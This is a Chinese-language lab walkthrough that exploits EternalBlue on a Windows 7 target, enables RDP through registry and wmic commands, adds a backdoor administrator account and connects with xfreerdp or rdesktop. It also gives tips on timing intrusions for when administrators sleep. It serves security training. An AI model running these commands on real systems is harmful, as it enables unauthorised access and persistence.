1、靶場環境

1、靶機和攻擊機的信息

攻擊機:kali-192.168.25.130

靶機:win7-192.168.25.132

2、永恒之藍漏洞Getshell

msf用ms17_010先簡單拿個shell

具體步驟不詳細展開,只要msf選擇ms17_010_eternalblue模塊,設置rhost參數就行,rhost就是目標靶機的地址。

進來之后,我們就可以在攻擊機上面控制win7靶機了,先查看開放的端口有沒有3389.

3、命令行打開3389遠程連接端口

netstat -an

沒開,所以要開一下,首先要看看當前是什么權限,如果是普通用戶權限可能不行,需要提權到system最高權限才行。

windows打開3389遠程連接的命令有兩種辦法,任選其一:


wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

顯示successful,再次確認查看遠程連接端口是否開啟:


netstat -an|find "3389"

顯示這樣就是監聽了。

補充一點
遠程桌面的默認端口是3389,為了防止管理員更改了遠程端口給我們連接帶來意想不到的情況,需要通過查看注冊表鍵值確認遠程桌面的端口是否為3389
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

(0xd3d是16進制的3389)

4、命令行添加登錄用戶

windows添加用戶的命令為:


net user hack 123123 /add

添加進管理員組:


net localgroup administrators hack /add

5、Kali自帶遠程連接工具進行連接

添加好之后,就可以用工具去連了,這里我目前知道的kali自帶工具有xfreerdp,這是公司的大佬介紹給我用的,還有一個是我自己找的,叫做:rdesktop。

現在分別講講各自的用法吧:

5.1、xfreerdp工具

①首先是xfreerdp的,命令格式如下:

很容易理解,/u就是用戶名,/p是密碼,/v是靶機(目標)的地址 /size就是圖形化界面的大小而已。


xfreerdp /u:hack /p:123123 /v:192.168.25.132 /size:80%

輸入y

按下回車,等待界面出現

5.2、xfreerdp工具

②然后是rdesktop,命令格式很簡單:


rdesktop 192.168.25.132

完整輸入yes之后,遠程成功,如果知道root本機密碼的情況下,可以直接用這個賬號去登,當然,也可以點其他用戶,用剛剛新建的hack賬號去登。

如果在真實滲透中,這種做法是相當危害,具體看下圖。

“站,是早上打的,銀手鐲是中午戴的,縫紉機是晚上學會的。”——魯迅

因為這里只是靶場演示,所以別想那么多,點擊是就完事了。

然后,我們看靶機有什么反應,需要點擊確定才能斷開連接,但是,如果30秒不動,還是能連上去,(所以要趁管理員睡著的時候滲透是比較好的。)

連進來,為所欲為了,純鼠標無腦操作,比命令行操作方便簡單,到此結束。

小記tips

什么時候用遠程比較方便呢?

比如一些CTF比賽,要你找系統里的flag,如果用命令行找,很多新手朋友可能不是很會,所以用這種遠程的方法鼠標點點點,文件夾翻一翻還是很舒服的,但是呢,如果真實環境滲透,攻防比賽,用遠程那是很大風險的,藍隊溯源你是分分鐘的事情,而且風險太大,日志會記錄行為,抓你只是時間問題,所以我們要遵守《中華人民共和國網絡安全法》,做個守法的白帽子。

可能你們會問,有沒有又安全,又能新建一個賬戶,但是呢,管理員還發現不了你的辦法。答案是當然有的!只需要用命令行的方法新建一個隱藏的賬戶就行,但是創建起來沒有這次實驗那么容易,需要看注冊表里的一些信息,稍微有點麻煩,具體方法下次想起來再更,干飯去了。